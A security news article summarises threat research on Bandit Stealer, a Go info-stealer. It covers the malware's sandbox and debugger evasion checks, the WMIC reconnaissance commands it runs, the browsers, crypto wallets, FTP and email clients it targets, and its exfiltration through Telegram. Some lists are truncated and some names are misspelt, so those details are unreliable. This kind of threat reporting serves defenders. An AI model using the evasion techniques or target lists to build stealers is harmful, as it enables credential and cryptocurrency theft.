Zscaler ThreatLabz recently tracked “Bandit Malware”, a new info-stealer that appeared in April 2023 and plucked the following data from 17 browsers:-
- Credit cards
Bandit Stealer swipes credentials for FTP and email clients which are popular not only that it goes after desktop crypto wallets too.
The malware, encoded in Go (Golang), and the stolen data are sent to a C2 server via Telegram. Apart from this, the malware also has the ability to stealthily bypass virtual environments and automated analysis tools.
Bandit Stealer evades analysis
The Bandit stealer bypasses both automated and manual analysis by applying various anti-analysis techniques. It uses the procfs Golang library to collect process information and scans for the following process which we have mentioned below:-
- virtual box
When a process matches these names, the Bandit infostealer automatically terminates execution and the latest Bandit samples verify the presence of debugger using the Windows API via the following calls:-
- Check RemoteDebuggerPresent
Bandit obtains UUID and screen dimensions by using the following WMIC commands:-
- wmic csproduct gets uuid
- wmic desktop monitor get screen height, screen width
The information gathered helps threat actors recognize analytics setups. To spot the virtual environments, trick the security vendors and evade suspicion, the Bandit stealer makes use of a wide list of the following:-
- IP addresses
- MAC addresses
- Computer names
- Process names
From the ‘api.ipify.org’ Bandit retrieves the external IP address of the system and then from the attachment it extracts a list of blacklisted IP addresses to compare them with the external IP address of the system .
Bandit steals the MAC address via GetAdaptersAddresses Windows API and then compares it against an appendix blacklist. If there is a match, Bandit will shut down and the MACs associated with virtualization may be blacklisted to bypass sandboxes.
Apart from this, Bandit Stealer also obtains additional blacklists using “cmd /c net session” to verify the victim’s username and computer name.
Using the CreateToolhelp32Snapshot Windows API, Bandit captures a process snapshot and scans it against a blacklist in the attachment. If a blacklisted process is found running in memory, Bandit will terminate.
Below we have listed all the browsers that are targeted by Bandit Stealer:-
- Yandex browser
- Iridium Browser
- 7Star Browser
- Vivaldi Browser
- Google Chrome
- Microsoft Edge
- Torch web browser
- Kometa Browser
- Brave Software
- Amigo Browser
- Epic privacy browser
- SeaMonkey browser
Targeted cryptocurrency wallets
Below we have mentioned all the cryptocurrency wallets that Bandit Stealer is targeting:-
- Coinbase wallet extension
- Saturn Wallet extension
- Binance chain wallet extension
- Coin98 Wallet
- TronLink wallet
- multibit Bitcoin
- Terra station
- Electron Cash
- Guildwallet extension
- MetaMask extension
- Bither Bitcoin Wallet
- ronin wallet extension
- multidose coin
- Cardiachain wallet extension
- Jaxx Liberty wallet
- Dash wallet
- Math Wallet extension
- Bitpay wallet extension
- Handy Wallet extension
- Bytecoin wallet
- Coinomi wallet
- Monero wallet
FTP client apps targeted
Below we have mentioned all the FTP client applications that Bandit Stealer targets:-
- Staff FTP
Email clients targeted
Below we have mentioned all the email clients that Bandit stealer is targeting:-
- Mail bird
- Opera Mail
Stolen data is contained in files in a subfolder in the %appdata%\local folder and the name of the subfolder follows [country_code][ip_address] format.
While the USERINFO.txt file contains the Bandit Stealer header and system info.
Bandit uses the Windows 10 v1803 standard cURL utility for versatile data transfer through various standards such as:-
In addition, from a hard-coded URL, it downloads the configuration information from the blacklist by exploiting “pastebin.com”.
Bandit sends this information to the threat actor via Telegram once data collection is complete.
Automated parsing and data extraction by the Bandit threat actor results in a JSON encoded response.
“AI-Based Email Security Measures Protect Your Business From Email Threats!” – Request a free demo.